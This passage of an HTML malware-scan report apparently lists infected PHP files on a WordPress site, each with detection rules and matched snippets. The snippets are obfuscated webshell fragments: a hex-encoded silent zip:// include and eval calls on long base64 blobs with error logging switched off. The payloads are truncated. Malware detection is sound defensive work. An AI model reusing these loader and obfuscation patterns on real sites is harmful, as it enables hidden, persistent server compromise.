</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">d6FN8HWQfM</span><span style="color: #007700">() { goto </span><span style="color: #0000BB">XgDAHScaig</span><span style="color: #007700">; </span><span style="color: #0000BB">Kl0zcaT0oU</span><span style="color: #007700">: </span><span style="color: #0000BB">Gbs_QzoKlT</span><span style="color: #007700">: goto </span><span style="color: #0000BB">KmljmyBtae</span><span style="color: #007700">; </span><span style="color: #0000BB">oz2qG6LyQH</span><span style="color: #007700">: foreach (</span><span style="color: #0000BB">$ezlRIERe1C </span><span style="color: #007700">as </span><span style="color: #0000BB">$mwuWOd8Cvt</span><span style="color: #007700">) { </span><span style="color: #0000BB">$n_xFBOLC2h</span><span style="color: #007700">[] = </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">WdtTT3cBlp</span><span style="color: #007700">(</span><span style="color: #0000BB">$mwuWOd8Cvt</span><span style="color: #007700">); </span><span style="color: #0000BB">n_nLo372Q6</span><span style="color: #007700">: } goto </span><span style="color: #0000BB">YfuYcsFJdt</span><span style="color: #007700">; </span><span style="color: #0000BB">kcJXs3dF_E</span><span style="color: #007700">: @</span><span style="color: #0000BB">$n_xFBOLC2h</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">](</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$n_xFBOLC2h</span><span style="color: #007700">[</span><span style="color: #0000BB">6 </span><span style="color: #007700">+ </span><span style="color: #0000BB">1</span><span style="color: #007700">] . </span><span style="color: #0000BB">$n_</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_170").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/maint/maint/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 375.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_171" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$faX</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@include_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6d\x70\x33\x5f\x36\x39\x37\x38\x37\x34\x30\x31\x63\x37\x34\x35\x38\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x34\x30\x31\x63\x37\x34\x35\x38\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_171").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/maint/maint/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 423.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_172" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$faX</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_172").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/eqbCMmdzB9K.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_173" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_173").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/WwkpT3xVdlz.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_174" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_174").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/WaHdUKI2hS6.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_175" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_175").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/sBG3z9FyEO7.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_176" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_176").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/abek2lFnCPI.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_177" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
